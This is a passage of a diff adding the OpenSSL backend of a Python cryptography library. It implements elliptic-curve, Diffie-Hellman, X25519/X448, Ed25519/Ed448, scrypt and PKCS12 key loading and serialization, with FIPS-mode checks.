curve: ec.EllipticCurve): + curve_nid = self._elliptic_curve_to_nid(curve) + return self._ec_key_new_by_curve_nid(curve_nid) + + def _ec_key_new_by_curve_nid(self, curve_nid: int): + ec_cdata = self._lib.EC_KEY_new_by_curve_name(curve_nid) + self.openssl_assert(ec_cdata != self._ffi.NULL) + return self._ffi.gc(ec_cdata, self._lib.EC_KEY_free) + + def elliptic_curve_exchange_algorithm_supported( + self, algorithm: ec.ECDH, curve: ec.EllipticCurve + ) -> bool: + if self._fips_enabled and not isinstance( + curve, self._fips_ecdh_curves + ): + return False + + return self.elliptic_curve_supported(curve) and isinstance( + algorithm, ec.ECDH + ) + + def _ec_cdata_to_evp_pkey(self, ec_cdata): + evp_pkey = self._create_evp_pkey_gc() + res = self._lib.EVP_PKEY_set1_EC_KEY(evp_pkey, ec_cdata) + self.openssl_assert(res == 1) + return evp_pkey + + def _elliptic_curve_to_nid(self, curve: ec.EllipticCurve) -> int: + """ + Get the NID for a curve name. + """ + + curve_aliases = {"secp192r1": "prime192v1", "secp256r1": "prime256v1"} + + curve_name = curve_aliases.get(curve.name, curve.name) + + curve_nid = self._lib.OBJ_sn2nid(curve_name.encode()) + if curve_nid == self._lib.NID_undef: + raise UnsupportedAlgorithm( + "{} is not a supported elliptic curve".format(curve.name), + _Reasons.UNSUPPORTED_ELLIPTIC_CURVE, + ) + return curve_nid + + @contextmanager + def _tmp_bn_ctx(self): + bn_ctx = self._lib.BN_CTX_new() + self.openssl_assert(bn_ctx != self._ffi.NULL) + bn_ctx = self._ffi.gc(bn_ctx, self._lib.BN_CTX_free) + self._lib.BN_CTX_start(bn_ctx) + try: + yield bn_ctx + finally: + self._lib.BN_CTX_end(bn_ctx) + + def _ec_key_determine_group_get_func(self, ctx): + """ + Given an EC_KEY determine the group and what function is required to + get point coordinates. 
+ """ + self.openssl_assert(ctx != self._ffi.NULL) + + nid_two_field = self._lib.OBJ_sn2nid(b"characteristic-two-field") + self.openssl_assert(nid_two_field != self._lib.NID_undef) + + group = self._lib.EC_KEY_get0_group(ctx) + self.openssl_assert(group != self._ffi.NULL) + + method = self._lib.EC_GROUP_method_of(group) + self.openssl_assert(method != self._ffi.NULL) + + nid = self._lib.EC_METHOD_get_field_type(method) + self.openssl_assert(nid != self._lib.NID_undef) + + if nid == nid_two_field and self._lib.Cryptography_HAS_EC2M: + get_func = self._lib.EC_POINT_get_affine_coordinates_GF2m + else: + get_func = self._lib.EC_POINT_get_affine_coordinates_GFp + + assert get_func + + return get_func, group + + def _ec_key_set_public_key_affine_coordinates(self, ctx, x: int, y: int): + """ + Sets the public key point in the EC_KEY context to the affine x and y + values. + """ + + if x < 0 or y < 0: + raise ValueError( + "Invalid EC key. Both x and y must be non-negative." + ) + + x = self._ffi.gc(self._int_to_bn(x), self._lib.BN_free) + y = self._ffi.gc(self._int_to_bn(y), self._lib.BN_free) + res = self._lib.EC_KEY_set_public_key_affine_coordinates(ctx, x, y) + if res != 1: + self._consume_errors() + raise ValueError("Invalid EC key.") + + def _private_key_bytes( + self, + encoding: serialization.Encoding, + format: serialization.PrivateFormat, + encryption_algorithm: serialization.KeySerializationEncryption, + key, + evp_pkey, + cdata, + ) -> bytes: + # validate argument types + if not isinstance(encoding, serialization.Encoding): + raise TypeError("encoding must be an item from the Encoding enum") + if not isinstance(format, serialization.PrivateFormat): + raise TypeError( + "format must be an item from the PrivateFormat enum" + ) + if not isinstance( + encryption_algorithm, serialization.KeySerializationEncryption + ): + raise TypeError( + "Encryption algorithm must be a KeySerializationEncryption " + "instance" + ) + + # validate password + if isinstance(encryption_algorithm, serialization.NoEncryption): + password = b"" + elif isinstance( + encryption_algorithm, serialization.BestAvailableEncryption + ): + password = encryption_algorithm.password + if len(password) > 1023: + raise ValueError( + "Passwords longer than 1023 bytes are not supported by " + "this backend" + ) + else: + raise ValueError("Unsupported encryption type") + + # PKCS8 + PEM/DER + if format is serialization.PrivateFormat.PKCS8: + if encoding is serialization.Encoding.PEM: + write_bio = self._lib.PEM_write_bio_PKCS8PrivateKey + elif encoding is serialization.Encoding.DER: + write_bio = self._lib.i2d_PKCS8PrivateKey_bio + else: + raise ValueError("Unsupported encoding for PKCS8") + return self._private_key_bytes_via_bio( + write_bio, evp_pkey, password + ) + + # TraditionalOpenSSL + PEM/DER + if format is serialization.PrivateFormat.TraditionalOpenSSL: + if self._fips_enabled and not isinstance( + encryption_algorithm, serialization.NoEncryption + ): + raise ValueError( + "Encrypted traditional OpenSSL format is not " + "supported in FIPS mode." 
+ ) + key_type = self._lib.EVP_PKEY_id(evp_pkey) + + if encoding is serialization.Encoding.PEM: + if key_type == self._lib.EVP_PKEY_RSA: + write_bio = self._lib.PEM_write_bio_RSAPrivateKey + elif key_type == self._lib.EVP_PKEY_DSA: + write_bio = self._lib.PEM_write_bio_DSAPrivateKey + elif key_type == self._lib.EVP_PKEY_EC: + write_bio = self._lib.PEM_write_bio_ECPrivateKey + else: + raise ValueError( + "Unsupported key type for TraditionalOpenSSL" + ) + return self._private_key_bytes_via_bio( + write_bio, cdata, password + ) + + if encoding is serialization.Encoding.DER: + if password: + raise ValueError( + "Encryption is not supported for DER encoded " + "traditional OpenSSL keys" + ) + if key_type == self._lib.EVP_PKEY_RSA: + write_bio = self._lib.i2d_RSAPrivateKey_bio + elif key_type == self._lib.EVP_PKEY_EC: + write_bio = self._lib.i2d_ECPrivateKey_bio + elif key_type == self._lib.EVP_PKEY_DSA: + write_bio = self._lib.i2d_DSAPrivateKey_bio + else: + raise ValueError( + "Unsupported key type for TraditionalOpenSSL" + ) + return self._bio_func_output(write_bio, cdata) + + raise ValueError("Unsupported encoding for TraditionalOpenSSL") + + # OpenSSH + PEM + if format is serialization.PrivateFormat.OpenSSH: + if encoding is serialization.Encoding.PEM: + return ssh.serialize_ssh_private_key(key, password) + + raise ValueError( + "OpenSSH private key format can only be used" + " with PEM encoding" + ) + + # Anything that key-specific code was supposed to handle earlier, + # like Raw. + raise ValueError("format is invalid with this key") + + def _private_key_bytes_via_bio(self, write_bio, evp_pkey, password): + if not password: + evp_cipher = self._ffi.NULL + else: + # This is a curated value that we will update over time. + evp_cipher = self._lib.EVP_get_cipherbyname(b"aes-256-cbc") + + return self._bio_func_output( + write_bio, + evp_pkey, + evp_cipher, + password, + len(password), + self._ffi.NULL, + self._ffi.NULL, + ) + + def _bio_func_output(self, write_bio, *args): + bio = self._create_mem_bio_gc() + res = write_bio(bio, *args) + self.openssl_assert(res == 1) + return self._read_mem_bio(bio) + + def _public_key_bytes( + self, + encoding: serialization.Encoding, + format: serialization.PublicFormat, + key, + evp_pkey, + cdata, + ) -> bytes: + if not isinstance(encoding, serialization.Encoding): + raise TypeError("encoding must be an item from the Encoding enum") + if not isinstance(format, serialization.PublicFormat): + raise TypeError( + "format must be an item from the PublicFormat enum" + ) + + # SubjectPublicKeyInfo + PEM/DER + if format is serialization.PublicFormat.SubjectPublicKeyInfo: + if encoding is serialization.Encoding.PEM: + write_bio = self._lib.PEM_write_bio_PUBKEY + elif encoding is serialization.Encoding.DER: + write_bio = self._lib.i2d_PUBKEY_bio + else: + raise ValueError( + "SubjectPublicKeyInfo works only with PEM or DER encoding" + ) + return self._bio_func_output(write_bio, evp_pkey) + + # PKCS1 + PEM/DER + if format is serialization.PublicFormat.PKCS1: + # Only RSA is supported here. 
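+            # Editor's note (illustrative only, not library code): callers
+            # reach this branch with something like
+            #
+            #     pem = public_key.public_bytes(
+            #         serialization.Encoding.PEM,
+            #         serialization.PublicFormat.PKCS1,
+            #     )
+            #
+            # where `public_key` is assumed to be an RSAPublicKey; any other
+            # key type is rejected just below.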
+ key_type = self._lib.EVP_PKEY_id(evp_pkey) + if key_type != self._lib.EVP_PKEY_RSA: + raise ValueError("PKCS1 format is supported only for RSA keys") + + if encoding is serialization.Encoding.PEM: + write_bio = self._lib.PEM_write_bio_RSAPublicKey + elif encoding is serialization.Encoding.DER: + write_bio = self._lib.i2d_RSAPublicKey_bio + else: + raise ValueError("PKCS1 works only with PEM or DER encoding") + return self._bio_func_output(write_bio, cdata) + + # OpenSSH + OpenSSH + if format is serialization.PublicFormat.OpenSSH: + if encoding is serialization.Encoding.OpenSSH: + return ssh.serialize_ssh_public_key(key) + + raise ValueError( + "OpenSSH format must be used with OpenSSH encoding" + ) + + # Anything that key-specific code was supposed to handle earlier, + # like Raw, CompressedPoint, UncompressedPoint + raise ValueError("format is invalid with this key") + + def dh_supported(self) -> bool: + return not self._lib.CRYPTOGRAPHY_IS_BORINGSSL + + def generate_dh_parameters( + self, generator: int, key_size: int + ) -> dh.DHParameters: + if key_size < dh._MIN_MODULUS_SIZE: + raise ValueError( + "DH key_size must be at least {} bits".format( + dh._MIN_MODULUS_SIZE + ) + ) + + if generator not in (2, 5): + raise ValueError("DH generator must be 2 or 5") + + dh_param_cdata = self._lib.DH_new() + self.openssl_assert(dh_param_cdata != self._ffi.NULL) + dh_param_cdata = self._ffi.gc(dh_param_cdata, self._lib.DH_free) + + res = self._lib.DH_generate_parameters_ex( + dh_param_cdata, key_size, generator, self._ffi.NULL + ) + self.openssl_assert(res == 1) + + return _DHParameters(self, dh_param_cdata) + + def _dh_cdata_to_evp_pkey(self, dh_cdata): + evp_pkey = self._create_evp_pkey_gc() + res = self._lib.EVP_PKEY_set1_DH(evp_pkey, dh_cdata) + self.openssl_assert(res == 1) + return evp_pkey + + def generate_dh_private_key( + self, parameters: dh.DHParameters + ) -> dh.DHPrivateKey: + dh_key_cdata = _dh_params_dup( + parameters._dh_cdata, self # type: ignore[attr-defined] + ) + + res = self._lib.DH_generate_key(dh_key_cdata) + self.openssl_assert(res == 1) + + evp_pkey = self._dh_cdata_to_evp_pkey(dh_key_cdata) + + return _DHPrivateKey(self, dh_key_cdata, evp_pkey) + + def generate_dh_private_key_and_parameters( + self, generator: int, key_size: int + ) -> dh.DHPrivateKey: + return self.generate_dh_private_key( + self.generate_dh_parameters(generator, key_size) + ) + + def load_dh_private_numbers( + self, numbers: dh.DHPrivateNumbers + ) -> dh.DHPrivateKey: + parameter_numbers = numbers.public_numbers.parameter_numbers + + dh_cdata = self._lib.DH_new() + self.openssl_assert(dh_cdata != self._ffi.NULL) + dh_cdata = self._ffi.gc(dh_cdata, self._lib.DH_free) + + p = self._int_to_bn(parameter_numbers.p) + g = self._int_to_bn(parameter_numbers.g) + + if parameter_numbers.q is not None: + q = self._int_to_bn(parameter_numbers.q) + else: + q = self._ffi.NULL + + pub_key = self._int_to_bn(numbers.public_numbers.y) + priv_key = self._int_to_bn(numbers.x) + + res = self._lib.DH_set0_pqg(dh_cdata, p, q, g) + self.openssl_assert(res == 1) + + res = self._lib.DH_set0_key(dh_cdata, pub_key, priv_key) + self.openssl_assert(res == 1) + + codes = self._ffi.new("int[]", 1) + res = self._lib.Cryptography_DH_check(dh_cdata, codes) + self.openssl_assert(res == 1) + + # DH_check will return DH_NOT_SUITABLE_GENERATOR if p % 24 does not + # equal 11 when the generator is 2 (a quadratic nonresidue). + # We want to ignore that error because p % 24 == 23 is also fine. + # Specifically, g is then a quadratic residue. 
Within the context of + # Diffie-Hellman this means it can only generate half the possible + # values. That sounds bad, but quadratic nonresidues leak a bit of + # the key to the attacker in exchange for having the full key space + # available. See: https://crypto.stackexchange.com/questions/12961 + if codes[0] != 0 and not ( + parameter_numbers.g == 2 + and codes[0] ^ self._lib.DH_NOT_SUITABLE_GENERATOR == 0 + ): + raise ValueError("DH private numbers did not pass safety checks.") + + evp_pkey = self._dh_cdata_to_evp_pkey(dh_cdata) + + return _DHPrivateKey(self, dh_cdata, evp_pkey) + + def load_dh_public_numbers( + self, numbers: dh.DHPublicNumbers + ) -> dh.DHPublicKey: + dh_cdata = self._lib.DH_new() + self.openssl_assert(dh_cdata != self._ffi.NULL) + dh_cdata = self._ffi.gc(dh_cdata, self._lib.DH_free) + + parameter_numbers = numbers.parameter_numbers + + p = self._int_to_bn(parameter_numbers.p) + g = self._int_to_bn(parameter_numbers.g) + + if parameter_numbers.q is not None: + q = self._int_to_bn(parameter_numbers.q) + else: + q = self._ffi.NULL + + pub_key = self._int_to_bn(numbers.y) + + res = self._lib.DH_set0_pqg(dh_cdata, p, q, g) + self.openssl_assert(res == 1) + + res = self._lib.DH_set0_key(dh_cdata, pub_key, self._ffi.NULL) + self.openssl_assert(res == 1) + + evp_pkey = self._dh_cdata_to_evp_pkey(dh_cdata) + + return _DHPublicKey(self, dh_cdata, evp_pkey) + + def load_dh_parameter_numbers( + self, numbers: dh.DHParameterNumbers + ) -> dh.DHParameters: + dh_cdata = self._lib.DH_new() + self.openssl_assert(dh_cdata != self._ffi.NULL) + dh_cdata = self._ffi.gc(dh_cdata, self._lib.DH_free) + + p = self._int_to_bn(numbers.p) + g = self._int_to_bn(numbers.g) + + if numbers.q is not None: + q = self._int_to_bn(numbers.q) + else: + q = self._ffi.NULL + + res = self._lib.DH_set0_pqg(dh_cdata, p, q, g) + self.openssl_assert(res == 1) + + return _DHParameters(self, dh_cdata) + + def dh_parameters_supported( + self, p: int, g: int, q: typing.Optional[int] = None + ) -> bool: + dh_cdata = self._lib.DH_new() + self.openssl_assert(dh_cdata != self._ffi.NULL) + dh_cdata = self._ffi.gc(dh_cdata, self._lib.DH_free) + + p = self._int_to_bn(p) + g = self._int_to_bn(g) + + if q is not None: + q = self._int_to_bn(q) + else: + q = self._ffi.NULL + + res = self._lib.DH_set0_pqg(dh_cdata, p, q, g) + self.openssl_assert(res == 1) + + codes = self._ffi.new("int[]", 1) + res = self._lib.Cryptography_DH_check(dh_cdata, codes) + self.openssl_assert(res == 1) + + return codes[0] == 0 + + def dh_x942_serialization_supported(self) -> bool: + return self._lib.Cryptography_HAS_EVP_PKEY_DHX == 1 + + def x25519_load_public_bytes(self, data: bytes) -> x25519.X25519PublicKey: + # When we drop support for CRYPTOGRAPHY_OPENSSL_LESS_THAN_111 we can + # switch this to EVP_PKEY_new_raw_public_key + if len(data) != 32: + raise ValueError("An X25519 public key is 32 bytes long") + + evp_pkey = self._create_evp_pkey_gc() + res = self._lib.EVP_PKEY_set_type(evp_pkey, self._lib.NID_X25519) + self.openssl_assert(res == 1) + res = self._lib.EVP_PKEY_set1_tls_encodedpoint( + evp_pkey, data, len(data) + ) + self.openssl_assert(res == 1) + return _X25519PublicKey(self, evp_pkey) + + def x25519_load_private_bytes( + self, data: bytes + ) -> x25519.X25519PrivateKey: + # When we drop support for CRYPTOGRAPHY_OPENSSL_LESS_THAN_111 we can + # switch this to EVP_PKEY_new_raw_private_key and drop the + # zeroed_bytearray garbage. 
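+        # Editor's note (hedged sketch, not library code): on OpenSSL 1.1.1+
+        # this whole construction collapses to roughly
+        #
+        #     data_ptr = self._ffi.from_buffer(data)
+        #     evp_pkey = self._lib.EVP_PKEY_new_raw_private_key(
+        #         self._lib.NID_X25519, self._ffi.NULL, data_ptr, len(data)
+        #     )
+        #
+        # mirroring x448_load_private_bytes further down in this file.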
+ # OpenSSL only has facilities for loading PKCS8 formatted private + # keys using the algorithm identifiers specified in + # https://tools.ietf.org/html/draft-ietf-curdle-pkix-09. + # This is the standard PKCS8 prefix for a 32 byte X25519 key. + # The form is: + # 0:d=0 hl=2 l= 46 cons: SEQUENCE + # 2:d=1 hl=2 l= 1 prim: INTEGER :00 + # 5:d=1 hl=2 l= 5 cons: SEQUENCE + # 7:d=2 hl=2 l= 3 prim: OBJECT :1.3.101.110 + # 12:d=1 hl=2 l= 34 prim: OCTET STRING (the key) + # Of course there's a bit more complexity. In reality OCTET STRING + # contains an OCTET STRING of length 32! So the last two bytes here + # are \x04\x20, which is an OCTET STRING of length 32. + if len(data) != 32: + raise ValueError("An X25519 private key is 32 bytes long") + + pkcs8_prefix = b'0.\x02\x01\x000\x05\x06\x03+en\x04"\x04 ' + with self._zeroed_bytearray(48) as ba: + ba[0:16] = pkcs8_prefix + ba[16:] = data + bio = self._bytes_to_bio(ba) + evp_pkey = self._lib.d2i_PrivateKey_bio(bio.bio, self._ffi.NULL) + + self.openssl_assert(evp_pkey != self._ffi.NULL) + evp_pkey = self._ffi.gc(evp_pkey, self._lib.EVP_PKEY_free) + self.openssl_assert( + self._lib.EVP_PKEY_id(evp_pkey) == self._lib.EVP_PKEY_X25519 + ) + return _X25519PrivateKey(self, evp_pkey) + + def _evp_pkey_keygen_gc(self, nid): + evp_pkey_ctx = self._lib.EVP_PKEY_CTX_new_id(nid, self._ffi.NULL) + self.openssl_assert(evp_pkey_ctx != self._ffi.NULL) + evp_pkey_ctx = self._ffi.gc(evp_pkey_ctx, self._lib.EVP_PKEY_CTX_free) + res = self._lib.EVP_PKEY_keygen_init(evp_pkey_ctx) + self.openssl_assert(res == 1) + evp_ppkey = self._ffi.new("EVP_PKEY **") + res = self._lib.EVP_PKEY_keygen(evp_pkey_ctx, evp_ppkey) + self.openssl_assert(res == 1) + self.openssl_assert(evp_ppkey[0] != self._ffi.NULL) + evp_pkey = self._ffi.gc(evp_ppkey[0], self._lib.EVP_PKEY_free) + return evp_pkey + + def x25519_generate_key(self) -> x25519.X25519PrivateKey: + evp_pkey = self._evp_pkey_keygen_gc(self._lib.NID_X25519) + return _X25519PrivateKey(self, evp_pkey) + + def x25519_supported(self) -> bool: + if self._fips_enabled: + return False + return not self._lib.CRYPTOGRAPHY_IS_LIBRESSL + + def x448_load_public_bytes(self, data: bytes) -> x448.X448PublicKey: + if len(data) != 56: + raise ValueError("An X448 public key is 56 bytes long") + + evp_pkey = self._lib.EVP_PKEY_new_raw_public_key( + self._lib.NID_X448, self._ffi.NULL, data, len(data) + ) + self.openssl_assert(evp_pkey != self._ffi.NULL) + evp_pkey = self._ffi.gc(evp_pkey, self._lib.EVP_PKEY_free) + return _X448PublicKey(self, evp_pkey) + + def x448_load_private_bytes(self, data: bytes) -> x448.X448PrivateKey: + if len(data) != 56: + raise ValueError("An X448 private key is 56 bytes long") + + data_ptr = self._ffi.from_buffer(data) + evp_pkey = self._lib.EVP_PKEY_new_raw_private_key( + self._lib.NID_X448, self._ffi.NULL, data_ptr, len(data) + ) + self.openssl_assert(evp_pkey != self._ffi.NULL) + evp_pkey = self._ffi.gc(evp_pkey, self._lib.EVP_PKEY_free) + return _X448PrivateKey(self, evp_pkey) + + def x448_generate_key(self) -> x448.X448PrivateKey: + evp_pkey = self._evp_pkey_keygen_gc(self._lib.NID_X448) + return _X448PrivateKey(self, evp_pkey) + + def x448_supported(self) -> bool: + if self._fips_enabled: + return False + return ( + not self._lib.CRYPTOGRAPHY_OPENSSL_LESS_THAN_111 + and not self._lib.CRYPTOGRAPHY_IS_BORINGSSL + ) + + def ed25519_supported(self) -> bool: + if self._fips_enabled: + return False + return not self._lib.CRYPTOGRAPHY_OPENSSL_LESS_THAN_111B + + def ed25519_load_public_bytes( + self, data: bytes + ) -> 
ed25519.Ed25519PublicKey: + utils._check_bytes("data", data) + + if len(data) != ed25519._ED25519_KEY_SIZE: + raise ValueError("An Ed25519 public key is 32 bytes long") + + evp_pkey = self._lib.EVP_PKEY_new_raw_public_key( + self._lib.NID_ED25519, self._ffi.NULL, data, len(data) + ) + self.openssl_assert(evp_pkey != self._ffi.NULL) + evp_pkey = self._ffi.gc(evp_pkey, self._lib.EVP_PKEY_free) + + return _Ed25519PublicKey(self, evp_pkey) + + def ed25519_load_private_bytes( + self, data: bytes + ) -> ed25519.Ed25519PrivateKey: + if len(data) != ed25519._ED25519_KEY_SIZE: + raise ValueError("An Ed25519 private key is 32 bytes long") + + utils._check_byteslike("data", data) + data_ptr = self._ffi.from_buffer(data) + evp_pkey = self._lib.EVP_PKEY_new_raw_private_key( + self._lib.NID_ED25519, self._ffi.NULL, data_ptr, len(data) + ) + self.openssl_assert(evp_pkey != self._ffi.NULL) + evp_pkey = self._ffi.gc(evp_pkey, self._lib.EVP_PKEY_free) + + return _Ed25519PrivateKey(self, evp_pkey) + + def ed25519_generate_key(self) -> ed25519.Ed25519PrivateKey: + evp_pkey = self._evp_pkey_keygen_gc(self._lib.NID_ED25519) + return _Ed25519PrivateKey(self, evp_pkey) + + def ed448_supported(self) -> bool: + if self._fips_enabled: + return False + return ( + not self._lib.CRYPTOGRAPHY_OPENSSL_LESS_THAN_111B + and not self._lib.CRYPTOGRAPHY_IS_BORINGSSL + ) + + def ed448_load_public_bytes(self, data: bytes) -> ed448.Ed448PublicKey: + utils._check_bytes("data", data) + if len(data) != _ED448_KEY_SIZE: + raise ValueError("An Ed448 public key is 57 bytes long") + + evp_pkey = self._lib.EVP_PKEY_new_raw_public_key( + self._lib.NID_ED448, self._ffi.NULL, data, len(data) + ) + self.openssl_assert(evp_pkey != self._ffi.NULL) + evp_pkey = self._ffi.gc(evp_pkey, self._lib.EVP_PKEY_free) + + return _Ed448PublicKey(self, evp_pkey) + + def ed448_load_private_bytes(self, data: bytes) -> ed448.Ed448PrivateKey: + utils._check_byteslike("data", data) + if len(data) != _ED448_KEY_SIZE: + raise ValueError("An Ed448 private key is 57 bytes long") + + data_ptr = self._ffi.from_buffer(data) + evp_pkey = self._lib.EVP_PKEY_new_raw_private_key( + self._lib.NID_ED448, self._ffi.NULL, data_ptr, len(data) + ) + self.openssl_assert(evp_pkey != self._ffi.NULL) + evp_pkey = self._ffi.gc(evp_pkey, self._lib.EVP_PKEY_free) + + return _Ed448PrivateKey(self, evp_pkey) + + def ed448_generate_key(self) -> ed448.Ed448PrivateKey: + evp_pkey = self._evp_pkey_keygen_gc(self._lib.NID_ED448) + return _Ed448PrivateKey(self, evp_pkey) + + def derive_scrypt( + self, + key_material: bytes, + salt: bytes, + length: int, + n: int, + r: int, + p: int, + ) -> bytes: + buf = self._ffi.new("unsigned char[]", length) + key_material_ptr = self._ffi.from_buffer(key_material) + res = self._lib.EVP_PBE_scrypt( + key_material_ptr, + len(key_material), + salt, + len(salt), + n, + r, + p, + scrypt._MEM_LIMIT, + buf, + length, + ) + if res != 1: + errors = self._consume_errors_with_text() + # memory required formula explained here: + # https://blog.filippo.io/the-scrypt-parameters/ + min_memory = 128 * n * r // (1024**2) + raise MemoryError( + "Not enough memory to derive key. These parameters require" + " {} MB of memory.".format(min_memory), + errors, + ) + return self._ffi.buffer(buf)[:] + + def aead_cipher_supported(self, cipher) -> bool: + cipher_name = aead._aead_cipher_name(cipher) + if self._fips_enabled and cipher_name not in self._fips_aead: + return False + # SIV isn't loaded through get_cipherbyname but instead a new fetch API + # only available in 3.0+. 
But if we know we're on 3.0+ then we know + # it's supported. + if cipher_name.endswith(b"-siv"): + return self._lib.CRYPTOGRAPHY_OPENSSL_300_OR_GREATER == 1 + else: + return ( + self._lib.EVP_get_cipherbyname(cipher_name) != self._ffi.NULL + ) + + @contextlib.contextmanager + def _zeroed_bytearray(self, length: int) -> typing.Iterator[bytearray]: + """ + This method creates a bytearray, which we copy data into (hopefully + also from a mutable buffer that can be dynamically erased!), and then + zero when we're done. + """ + ba = bytearray(length) + try: + yield ba + finally: + self._zero_data(ba, length) + + def _zero_data(self, data, length: int) -> None: + # We clear things this way because at the moment we're not + # sure of a better way that can guarantee it overwrites the + # memory of a bytearray and doesn't just replace the underlying char *. + for i in range(length): + data[i] = 0 + + @contextlib.contextmanager + def _zeroed_null_terminated_buf(self, data): + """ + This method takes bytes, which can be a bytestring or a mutable + buffer like a bytearray, and yields a null-terminated version of that + data. This is required because PKCS12_parse doesn't take a length with + its password char * and ffi.from_buffer doesn't provide null + termination. So, to support zeroing the data via bytearray we + need to build this ridiculous construct that copies the memory, but + zeroes it after use. + """ + if data is None: + yield self._ffi.NULL + else: + data_len = len(data) + buf = self._ffi.new("char[]", data_len + 1) + self._ffi.memmove(buf, data, data_len) + try: + yield buf + finally: + # Cast to a uint8_t * so we can assign by integer + self._zero_data(self._ffi.cast("uint8_t *", buf), data_len) + + def load_key_and_certificates_from_pkcs12( + self, data: bytes, password: typing.Optional[bytes] + ) -> typing.Tuple[ + typing.Optional[PRIVATE_KEY_TYPES], + typing.Optional[x509.Certificate], + typing.List[x509.Certificate], + ]: + pkcs12 = self.load_pkcs12(data, password) + return ( + pkcs12.key, + pkcs12.cert.certificate if pkcs12.cert else None, + [cert.certificate for cert in pkcs12.additional_certs], + ) + + def load_pkcs12( + self, data: bytes, password: typing.Optional[bytes] + ) -> PKCS12KeyAndCertificates: + if password is not None: + utils._check_byteslike("password", password) + + bio = self._bytes_to_bio(data) + p12 = self._lib.d2i_PKCS12_bio(bio.bio, self._ffi.NULL) + if p12 == self._ffi.NULL: + self._consume_errors() + raise ValueError("Could not deserialize PKCS12 data") + + p12 = self._ffi.gc(p12, self._lib.PKCS12_free) + evp_pkey_ptr = self._ffi.new("EVP_PKEY **") + x509_ptr = self._ffi.new("X509 **") + sk_x509_ptr = self._ffi.new("Cryptography_STACK_OF_X509 **") + with self._zeroed_null_terminated_buf(password) as password_buf: + res = self._lib.PKCS12_parse( + p12, password_buf, evp_pkey_ptr, x509_ptr, sk_x509_ptr + ) + + # Workaround for + # https://github.com/libressl-portable/portable/issues/659 + if self._lib.CRYPTOGRAPHY_LIBRESSL_LESS_THAN_340: + self._consume_errors() + + if res == 0: + self._consume_errors() + raise ValueError("Invalid password or PKCS12 data") + + cert = None + key = None + additional_certificates = [] + + if evp_pkey_ptr[0] != self._ffi.NULL: + evp_pkey = self._ffi.gc(evp_pkey_ptr[0], self._lib.EVP_PKEY_free) + key = self._evp_pkey_to_private_key(evp_pkey) + + if x509_ptr[0] != self._ffi.NULL: + x509 = self._ffi.gc(x509_ptr[0], self._lib.X509_free) + cert_obj = self._ossl2cert(x509) + name = None + maybe_name = self._lib.X509_alias_get0(x509, 
self._ffi.NULL) + if maybe_name != self._ffi.NULL: + name = self._ffi.string(maybe_name) + cert = PKCS12Certificate(cert_obj, name) + + if sk_x509_ptr[0] != self._ffi.NULL: + sk_x509 = self._ffi.gc(sk_x509_ptr[0], self._lib.sk_X509_free) + num = self._lib.sk_X509_num(sk_x509_ptr[0]) + + # In OpenSSL < 3.0.0 PKCS12 parsing reverses the order of the + # certificates. + indices: typing.Iterable[int] + if ( + self._lib.CRYPTOGRAPHY_OPENSSL_300_OR_GREATER + or self._lib.CRYPTOGRAPHY_IS_BORINGSSL + ): + indices = range(num) + else: + indices = reversed(range(num)) + + for i in indices: + x509 = self._lib.sk_X509_value(sk_x509, i) + self.openssl_assert(x509 != self._ffi.NULL) + x509 = self._ffi.gc(x509, self._lib.X509_free) + addl_cert = self._ossl2cert(x509) + addl_name = None + maybe_name = self._lib.X509_alias_get0(x509, self._ffi.NULL) + if maybe_name != self._ffi.NULL: + addl_name = self._ffi.string(maybe_name) + additional_certificates.append( + PKCS12Certificate(addl_cert, addl_name) + ) + + return PKCS12KeyAndCertificates(key, cert, additional_certificates) + + def serialize_key_and_certificates_to_pkcs12( + self, + name: typing.Optional[bytes], + key: typing.Optional[_ALLOWED_PKCS12_TYPES], + cert: typing.Optional[x509.Certificate], + cas: typing.Optional[typing.List[_PKCS12_CAS_TYPES]], + encryption_algorithm: serialization.KeySerializationEncryption, + ) -> bytes: + password = None + if name is not None: + utils._check_bytes("name", name) + + if isinstance(encryption_algorithm, serialization.NoEncryption): + nid_cert = -1 + nid_key = -1 + pkcs12_iter = 0 + mac_iter = 0 + elif isinstance( + encryption_algorithm, serialization.BestAvailableEncryption + ): + # PKCS12 encryption is hopeless trash and can never be fixed. + # This is the least terrible option. + nid_cert = self._lib.NID_pbe_WithSHA1And3_Key_TripleDES_CBC + nid_key = self._lib.NID_pbe_WithSHA1And3_Key_TripleDES_CBC + # At least we can set this higher than OpenSSL's default + pkcs12_iter = 20000 + # mac_iter chosen for compatibility reasons, see: + # https://www.openssl.org/docs/man1.1.1/man3/PKCS12_create.html + # Did we mention how lousy PKCS12 encryption is? 
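+            # Editor's note (illustrative only): callers typically reach this
+            # branch through the public helper, e.g.
+            #
+            #     from cryptography.hazmat.primitives.serialization.pkcs12 import (
+            #         serialize_key_and_certificates,
+            #     )
+            #     p12_blob = serialize_key_and_certificates(
+            #         b"friendlyname", key, cert, None,
+            #         serialization.BestAvailableEncryption(b"password"),
+            #     )
+            #
+            # `key` and `cert` are assumed placeholders for a private key and
+            # its certificate.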
+ mac_iter = 1 + password = encryption_algorithm.password + else: + raise ValueError("Unsupported key encryption type") + + if cas is None or len(cas) == 0: + sk_x509 = self._ffi.NULL + else: + sk_x509 = self._lib.sk_X509_new_null() + sk_x509 = self._ffi.gc(sk_x509, self._lib.sk_X509_free) + + # This list is to keep the x509 values alive until end of function + ossl_cas = [] + for ca in cas: + if isinstance(ca, PKCS12Certificate): + ca_alias = ca.friendly_name + ossl_ca = self._cert2ossl(ca.certificate) + with self._zeroed_null_terminated_buf( + ca_alias + ) as ca_name_buf: + res = self._lib.X509_alias_set1( + ossl_ca, ca_name_buf, -1 + ) + self.openssl_assert(res == 1) + else: + ossl_ca = self._cert2ossl(ca) + ossl_cas.append(ossl_ca) + res = self._lib.sk_X509_push(sk_x509, ossl_ca) + backend.openssl_assert(res >= 1) + + with self._zeroed_null_terminated_buf(password) as password_buf: + with self._zeroed_null_terminated_buf(name) as name_buf: + ossl_cert = self._cert2ossl(cert) if cert else self._ffi.NULL + if key is not None: + evp_pkey = key._evp_pkey # type: ignore[union-attr] + else: + evp_pkey = self._ffi.NULL + + p12 = self._lib.PKCS12_create( + password_buf, + name_buf, + evp_pkey, + ossl_cert, + sk_x509, + nid_key, + nid_cert, + pkcs12_iter, + mac_iter, + 0, + ) + + self.openssl_assert(p12 != self._ffi.NULL) + p12 = self._ffi.gc(p12, self._lib.PKCS12_free) + + bio = self._create_mem_bio_gc() + res = self._lib.i2d_PKCS12_bio(bio, p12) + self.openssl_assert(res > 0) + return self._read_mem_bio(bio) + + def poly1305_supported(self) -> bool: + if self._fips_enabled: + return False + return 